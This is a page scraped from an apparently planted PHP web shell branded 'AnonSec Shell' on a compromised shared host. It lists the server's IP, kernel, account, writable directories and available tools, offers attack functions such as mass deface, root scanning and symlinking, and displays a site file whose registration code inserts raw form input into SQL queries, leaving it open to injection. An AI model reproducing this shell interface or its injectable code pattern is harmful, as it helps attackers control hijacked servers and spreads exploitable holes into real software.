AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 172.71.28.145   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/cp648411/www/simded.com/include/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/cp648411/www/simded.com/include/ajax_regi_professor - old.php
<?php
include('../include72/class.php');

/*echo '<pre>';
print_r($_POST);
echo '</pre>';

echo '<pre>';
print_r($_FILES);
echo '</pre>';

exit;*/


if($_FILES["file_idcard"]["error"] == 0)
{
	$fileIdcard = $image_class->file_up($_FILES["file_idcard"],'idcard',$upload);	
}

$pass_random = $User_db->pass_random();
$id = $runid_class->run_id('professor_runid');
$ref = str_pad( $id , 4, "0", STR_PAD_LEFT);
$codeshop = 'P'.$ref;

$list = array(	
				'table'=>'professor',
				'id'=>"'".@$id."'",
				'code'=>"'".@$codeshop."'",
				'idcard'=>"'".@$_POST['idcard']."'",
				'name'=>"'".@$_POST["name"]."'",
				'lastname'=>"'".@$_POST["lastname"]."'",
				'email'=>"'".@$_POST["email"]."'",
				'nameprophecy'=>"'".@$_POST["nameprophecy"]."'",
				'science'=>"'".@$_POST["science"]."'",
				'phone'=>"'".@$_POST["phone"]."'",
				'web'=>"'".@$_POST["web"]."'",
				'lineid'=>"'".@$_POST["lineid"]."'",
				'title'=>"'".@$_POST["title"]."'",
				'detail'=>"'".@$_POST["detail"]."'",
				'experience'=>"'".@$_POST["experience"]."'",
				'status'=>'1',
				'image_idcard'=>"'".$fileIdcard."'",
				'password'=>"'".$pass_random."'",
				'createdate'=>"'".$date."'",
				'up_date'=>"'".$date."'"
			);
				  
$add = $actiondata_db->add_db($list);

?>
<meta http-equiv="refresh" content="0;URL=register_true.php?s=<?php echo $add['suc']?>" />
<?php
exit;
?>

Anon7 - 2022
AnonSec Team